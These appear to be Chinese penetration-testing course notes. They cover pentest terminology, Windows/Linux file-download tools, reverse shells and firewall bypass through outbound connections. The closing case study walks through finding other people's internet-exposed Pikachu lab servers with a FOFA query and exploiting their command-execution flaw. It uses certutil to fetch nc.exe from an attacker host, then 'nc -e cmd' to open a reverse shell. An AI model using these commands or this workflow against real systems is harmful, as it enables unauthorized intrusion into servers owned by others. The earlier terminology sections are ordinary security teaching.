#知识点:
1、名词解释-渗透测试-漏洞&攻击&后门&代码&专业词
2、必备技能-操作系统-用途&命令&权限&用户&防火墙
3、必备技能-文件下载-缘由&场景&使用&提权&后渗透
4、必备技能-反弹命令-缘由&场景&使用&提权&后渗透
前后端;POC/EXP;payload/shellcode;后门/webshell;木马/病毒;
反弹;回显;跳板;黑白盒测试;暴力破解;社会工程学;撞库;ATT&CK等
渗透测试常用专业术语总结
https://www.cnblogs.com/sunny11/p/13583083.html
ATT&CK参考名词:
#操作系统-用途&命令&权限&用户&防火墙
1、个人计算机&服务器用机
2、Windows&Linux常见命令
web安全入门篇-渗透测试中常用的命令
【3】web安全入门篇-渗透测试中常用的命令_【3】web安全入门篇-渗透测试中常用的命令-csdn博客-CSDN博客
3、文件权限&服务权限&用户权限等
权限高低分——拒绝优先
4、系统用户&用户组&服务用户等分类
5、自带防火墙出站&入站规则策略协议
#实用案例1:文件上传下载-解决无图形化&解决数据传输
Linux: wget curl Python ruby perl java等
Windows: PowerShell Certutil Bitsadmin msiexec mshta rund1132等
解决的问题:
例如:后期遇见的系统不是图形化,通过文件上传下载解决无图形化&解决数据传输
棱角社区-文件下载命令生成&反弹shell生成器
[~]#棱角 ::Edge.Forum* (ywhack.com)
Linux: wget下载文件实例
#实用案例2:反弹shell命令-解决数据回显&解决数据通讯
useradd 用户名 passwd 用户名
测试Linux系统添加用户或修改密码命令交互回显问题
数据回显:是否显示命令执行成功
交互式命令:交互式模式就是在终端上执行,shell等待你的输入,并且立即执行你提交的命令
#结合案例1: 防火墙绕过-正向连接&反向连接&内网服务器
1、内网:
内网->xiaodi8
xiaodi8!->内网(建议学习一下网络通信基础中的DNAT和SNAT即可理解)
解决公网访问内网服务器的技术:端口映射。
2、防火墙:
xiaodi8 <-aliyun
xiaodi8防火墙->aliyun
a1iyun!->xiaodi8防火墙
(防火墙具有出站规则宽松,入站规则严格的特性,利用这条特性将内网服务器通过反弹shell将权限赋予给监听主机)
#结合案例2:学会了有手就行-Fofa拿下同行Pikachu服务器
文件下载&反弹shell:
certutil.exe -urlcache -split -f http://192.168.1.10:80/nc.exe nc.exe
nc -e cmd 192.168.1.10 5566
1、fofa收集pikachu靶场
实战fofa:
"pikachu" && country="CN" && title=="Get the pikachu"
2、测试rce漏洞 ping 127.0.0.1看返回信息是否含有命令执行后的内容
3、远程命令执行下载
生成下载地址命令:
certutil -urlcache -split -f 服务器下载地址nc.exe n.exe
4、本地NC监听开启:
nc -lvvp 556
Pikachu使用远程命令执行反弹shell:
n.exe -e cmd 服务器地址 5566